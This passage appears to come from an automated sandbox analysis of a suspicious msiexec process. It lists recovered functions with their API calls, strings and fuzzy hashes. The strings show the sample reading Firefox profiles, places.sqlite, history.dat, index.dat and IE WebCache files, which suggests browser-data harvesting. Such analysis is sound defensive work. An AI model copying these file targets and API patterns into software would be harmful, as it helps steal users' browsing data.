                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                            • free.MSVCRT ref: 0041848B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorFileLastfree
                                                                                            • String ID: |A
                                                                                            • API String ID: 981974120-1717621600
                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                            • String ID: $0.@
                                                                                            • API String ID: 2758756878-1896041820
                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2941347001-0
                                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscat$wcscpywcslen
                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                            • API String ID: 2489821370-1174173950
                                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 669240632-0
                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                            • String ID: "%s"
                                                                                            • API String ID: 1343145685-3297466227
                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                            • API String ID: 1714573020-3385500049
                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                            • memset.MSVCRT ref: 00408828
                                                                                            • memset.MSVCRT ref: 00408840
                                                                                            • memset.MSVCRT ref: 00408858
                                                                                            • memset.MSVCRT ref: 00408870
                                                                                            • memset.MSVCRT ref: 00408888
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2911713577-0
                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: @ $SQLite format 3
                                                                                            • API String ID: 1475443563-3708268960
                                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 1579243037-1578091866
                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                            • API String ID: 3354267031-2114579845
                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                            APIs
                                                                                            Strings
                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                            • API String ID: 2221118986-1725073988
                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                            APIs
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$memcmp
                                                                                            • String ID: $$8
                                                                                            • API String ID: 2808797137-435121686
                                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                            APIs
                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                            • String ID:
                                                                                            • API String ID: 1979745280-0
                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                            APIs
                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                            • free.MSVCRT ref: 00418803
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 1355100292-0
                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                            APIs
                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProcVersionmemsetwcscpy
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 4182280571-2036018995
                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                            APIs
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                            • String ID: history.dat$places.sqlite
                                                                                            • API String ID: 2641622041-467022611
                                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                            APIs
                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 839530781-0
                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID: *.*$index.dat
                                                                                            • API String ID: 1974802433-2863569691
                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
